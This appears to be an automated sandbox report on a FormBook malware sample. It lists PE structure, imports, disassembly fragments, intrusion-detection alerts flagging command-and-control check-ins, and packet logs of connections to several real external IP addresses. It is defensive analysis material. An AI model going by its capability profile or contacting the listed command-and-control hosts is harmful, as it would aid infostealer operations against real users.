                                          lea eax, dword ptr [ecx+04h]
                                          mov dword ptr [ecx], 0049FDD0h
                                          push eax
                                          call 00007F0B3CDE2388h
                                          pop ecx
                                          ret
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          mov esi, ecx
                                          lea eax, dword ptr [esi+04h]
                                          mov dword ptr [esi], 0049FDD0h
                                          push eax
                                          call 00007F0B3CDE2371h
                                          test byte ptr [ebp+08h], 00000001h
                                          pop ecx

                                          Rich Headers

                                          Programming Language:
                                          • [ C ] VS2008 SP1 build 30729
                                          • [IMP] VS2008 SP1 build 30729

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5922c.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12e0000x7594.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0xd40000x5922c0x59400b2227dda46af15e41cec27f6e72420acFalse0.9257046568627451data7.89013998975491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x12e0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                          RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                          RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                          RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                          RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                          RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                          RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                          RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                          RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                          RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                          RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                          RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                          RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                          RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                          RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                          RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                          RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                          RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                          RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                          RT_RCDATA0xdc7b80x504c4data1.0003374885983582
                                          RT_GROUP_ICON0x12cc7c0x76dataEnglishGreat Britain0.6610169491525424
                                          RT_GROUP_ICON0x12ccf40x14dataEnglishGreat Britain1.25
                                          RT_GROUP_ICON0x12cd080x14dataEnglishGreat Britain1.15
                                          RT_GROUP_ICON0x12cd1c0x14dataEnglishGreat Britain1.25
                                          RT_VERSION0x12cd300x10cdataEnglishGreat Britain0.5932835820895522
                                          RT_MANIFEST0x12ce3c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                          Imports

                                          DLLImport
                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                          PSAPI.DLLGetProcessMemoryInfo
                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                          UxTheme.dllIsThemeActive
                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishGreat Britain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                          2024-08-30T09:42:06.562958+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975380192.168.2.491.195.240.94
                                          2024-08-30T09:42:47.109778+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976580192.168.2.4195.110.124.133
                                          2024-08-30T09:40:31.695115+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974580192.168.2.4116.50.37.244
                                          2024-08-30T09:40:16.681474+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974180192.168.2.454.65.172.3
                                          2024-08-30T09:42:33.714031+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976180192.168.2.466.29.149.46
                                          2024-08-30T09:42:19.982608+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975780192.168.2.415.197.212.58
                                          2024-08-30T09:39:51.496497+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973680192.168.2.4154.215.72.110
                                          2024-08-30T09:41:53.215210+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974980192.168.2.485.159.66.93
                                          2024-08-30T09:43:00.311784+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976980192.168.2.415.197.240.20

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 30, 2024 09:39:50.597701073 CEST4973680192.168.2.4154.215.72.110
                                          Aug 30, 2024 09:39:50.603231907 CEST8049736154.215.72.110192.168.2.4
                                          Aug 30, 2024 09:39:50.603349924 CEST4973680192.168.2.4154.215.72.110
                                          Aug 30, 2024 09:39:50.605926991 CEST4973680192.168.2.4154.215.72.110
                                          Aug 30, 2024 09:39:50.610943079 CEST8049736154.215.72.110192.168.2.4
                                          Aug 30, 2024 09:39:51.496270895 CEST8049736154.215.72.110192.168.2.4
                                          Aug 30, 2024 09:39:51.496443033 CEST8049736154.215.72.110192.168.2.4
                                          Aug 30, 2024 09:39:51.496496916 CEST4973680192.168.2.4154.215.72.110
                                          Aug 30, 2024 09:39:51.499572992 CEST4973680192.168.2.4154.215.72.110
                                          Aug 30, 2024 09:39:51.504424095 CEST8049736154.215.72.110192.168.2.4
                                          Aug 30, 2024 09:40:07.872349024 CEST4973880192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:07.878892899 CEST804973854.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:07.878979921 CEST4973880192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:07.880949020 CEST4973880192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:07.885833979 CEST804973854.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:08.771903992 CEST804973854.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:08.771929026 CEST804973854.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:08.772066116 CEST4973880192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:08.772098064 CEST804973854.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:08.772150993 CEST4973880192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:09.391448021 CEST4973880192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:10.419481039 CEST4973980192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:10.425546885 CEST804973954.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:10.425654888 CEST4973980192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:10.427617073 CEST4973980192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:10.434425116 CEST804973954.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:11.312846899 CEST804973954.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:11.313026905 CEST804973954.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:11.313162088 CEST804973954.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:11.313199043 CEST4973980192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:11.313235998 CEST4973980192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:11.935142040 CEST4973980192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:12.953929901 CEST4974080192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:13.266935110 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.267079115 CEST4974080192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:13.269438982 CEST4974080192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:13.274362087 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274379969 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274425983 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274435043 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274445057 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274480104 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274497986 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274506092 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:13.274513960 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:14.188205004 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:14.188229084 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:14.188244104 CEST804974054.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:14.188340902 CEST4974080192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:14.778850079 CEST4974080192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:15.797678947 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:15.803677082 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:15.803782940 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:15.805602074 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:15.810568094 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:16.681288958 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:16.681305885 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:16.681318998 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:16.681473970 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:16.681509018 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:16.681523085 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:16.681628942 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:16.681663036 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:16.701281071 CEST4974180192.168.2.454.65.172.3
                                          Aug 30, 2024 09:40:16.706270933 CEST804974154.65.172.3192.168.2.4
                                          Aug 30, 2024 09:40:23.000622034 CEST4974280192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:23.005501032 CEST8049742116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:23.005656958 CEST4974280192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:23.011904955 CEST4974280192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:23.016799927 CEST8049742116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:23.906018972 CEST8049742116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:23.906049013 CEST8049742116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:23.906136990 CEST4974280192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:24.528872013 CEST4974280192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:25.548032045 CEST4974380192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:25.552987099 CEST8049743116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:25.553148031 CEST4974380192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:25.555146933 CEST4974380192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:25.560010910 CEST8049743116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:26.448451042 CEST8049743116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:26.448673964 CEST8049743116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:26.448759079 CEST4974380192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:27.060203075 CEST4974380192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:28.079061985 CEST4974480192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:28.118654013 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.118752003 CEST4974480192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:28.121078968 CEST4974480192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:28.126781940 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.126852989 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.126893044 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.126905918 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.126965046 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.127012014 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.127023935 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.127057076 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:28.127099991 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:29.002306938 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:29.002382994 CEST8049744116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:29.002455950 CEST4974480192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:29.622772932 CEST4974480192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:30.641495943 CEST4974580192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:30.646356106 CEST8049745116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:30.646493912 CEST4974580192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:30.648391008 CEST4974580192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:30.653166056 CEST8049745116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:31.694725990 CEST8049745116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:31.694873095 CEST8049745116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:31.694884062 CEST8049745116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:31.695115089 CEST4974580192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:31.698015928 CEST4974580192.168.2.4116.50.37.244
                                          Aug 30, 2024 09:40:31.702789068 CEST8049745116.50.37.244192.168.2.4
                                          Aug 30, 2024 09:40:44.883114100 CEST4974680192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:44.888000011 CEST804974685.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:44.888079882 CEST4974680192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:44.890352964 CEST4974680192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:44.895112038 CEST804974685.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:46.404053926 CEST4974680192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:46.409365892 CEST804974685.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:46.409563065 CEST4974680192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:47.422787905 CEST4974780192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:47.428852081 CEST804974785.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:47.429029942 CEST4974780192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:47.430948973 CEST4974780192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:47.435825109 CEST804974785.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:48.935173988 CEST4974780192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:48.940439939 CEST804974785.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:48.940507889 CEST4974780192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:49.954236031 CEST4974880192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:49.959290981 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.959446907 CEST4974880192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:49.962585926 CEST4974880192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:49.967611074 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967628002 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967639923 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967667103 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967730999 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967775106 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967824936 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967837095 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:49.967848063 CEST804974885.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:51.466382027 CEST4974880192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:51.471806049 CEST804974885.159.66.93192.168.2.4
